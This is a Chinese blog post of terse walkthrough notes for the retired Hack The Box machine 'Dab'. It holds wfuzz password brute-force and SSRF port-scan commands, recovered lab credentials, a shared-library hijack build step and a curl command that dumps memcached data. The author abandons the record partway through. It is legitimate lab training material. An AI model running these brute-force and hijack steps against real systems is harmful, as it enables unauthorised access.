• HTB-靶机-Dab


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.86

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.86 -o ./Dab-autorecon

    可能用到的知识点

    进行模糊爆破密码
    wfuzz -c --hl=18 -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt -d 'username=admin&password=FUZZ&submit=Login' http://10.10.10.86/login
    
    admin:Password1
    
    wfuzz -u http://10.10.10.86:8080/ -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt --hh 324 -b password=FUZZ
    
    secret
    
    探测可能开放的端口
    wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=bmfx' -H "Cookie: password=secret" --hc=500
    
    login: genevieve   password: Princess1
    
    gcc -shared -fPIC /dev/shm/bmfx.c -o /dev/shm/libseclogin.so
    
    s3cur3l0g1n
    
    curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq .
    本靶机通过上述命令和burpsuite重放都没法获取用户名和加密的hash,原因未知,重置过靶机也是一样的情况,根据网上的资料直接跳过过程,拿去到flag,本靶机不做记录
    
    参考:
    https://0xdf.gitlab.io/2019/02/02/htb-dab.html
    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    Linux大文件传输(转)
    SSH登录很慢问题的解决
    tcp-ip-状态详解(转)
    shell下root用户切换其他用户运行程序
    Linux进程内存分析pmap命令(转)
    svn在linux下的使用(转)
    双重检查锁定及单例模式(转)
    深入分析Volatile的实现原理(转)
    JMM & synchronized概述(转)
    性能测试工具Locust
  • 原文地址:https://www.cnblogs.com/autopwn/p/14132961.html
Copyright © 2020-2023  润新知